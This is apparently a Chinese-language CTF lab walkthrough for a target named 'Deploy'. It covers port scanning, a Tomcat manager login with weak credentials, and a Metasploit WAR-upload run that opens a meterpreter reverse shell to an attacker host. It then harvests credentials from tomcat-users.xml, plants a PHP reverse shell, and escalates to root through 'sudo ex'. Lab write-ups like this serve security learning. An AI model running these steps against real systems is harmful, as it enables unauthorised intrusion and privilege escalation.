# 靶场搭建
下载:Deploy
Nat,IP: 192.168.1.137
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.56 (Debian) | |
8080/tcp open http Apache Tomcat | |
|_http-open-proxy: Proxy might be redirecting requests | |
|_http-title: Apache Tomcat |
8080 跑 tomcat,很容易想到传 war 包
后台口令试一下垃圾弱口令: tomcat/s3cret
OK 了家人进来了,直接 msf 启动部署 war 包拿 shell 吧
# war 包利用
msf6 exploit(multi/http/tomcat_mgr_upload) > show options | |
Module options (exploit/multi/http/tomcat_mgr_upload): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
HttpPassword s3cret no The password for the specified username | |
HttpUsername tomcat no The username to authenticate as | |
Proxies no A proxy chain of format type:host:port[,type:host:port | |
][...] | |
RHOSTS 192.168.1.137 yes The target host(s), see https://docs.metasploit.com/do | |
cs/using-metasploit/basics/using-metasploit.html | |
RPORT 8080 yes The target port (TCP) | |
SSL false no Negotiate SSL/TLS for outgoing connections | |
TARGETURI /manager yes The URI path of the manager app (/html/upload and /und | |
eploy will be used) | |
VHOST no HTTP server virtual host | |
Payload options (linux/x86/meterpreter/reverse_tcp): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
LHOST 192.168.1.129 yes The listen address (an interface may be specified) | |
LPORT 4444 yes The listen port | |
Exploit target: | |
Id Name | |
-- ---- | |
2 Linux x86 | |
View the full module info with the info, or info -d command. | |
msf6 exploit(multi/http/tomcat_mgr_upload) > run | |
[*] Started reverse TCP handler on 192.168.1.129:4444 | |
[*] Retrieving session ID and CSRF token... | |
[*] Uploading and deploying mZDUACZIYO6... | |
[*] Executing mZDUACZIYO6... | |
[*] Sending stage (1017704 bytes) to 192.168.1.137 | |
[*] Undeploying mZDUACZIYO6 ... | |
[*] Meterpreter session 3 opened (192.168.1.129:4444 -> 192.168.1.137:44790) at 2024-05-18 04:05:41 -0400 | |
[*] Undeployed at /manager/html/undeploy | |
meterpreter > getuid | |
Server username: tomcat |
# 提权
suggest 出来的提权模块都不能用,G 了
查看 /etc/tomcat9/tomcat-users.xml
发现还有一个用户 sa/salala!!
SSH 上去,拿到 sa
的 shell
通过 ps -ef
查看到 toor
用户起了 apache 服务,拿我们传一个 php 的反弹 shell 到 /var/www/html
,去访问触发就能拿到 toor
的 shell
sudo -l
查看到 ex 有权限
$ sudo ex | |
!/bin/bash |
拿到了 root 权限
# 小结
服务器上可能存储账号密码的地方多翻一下。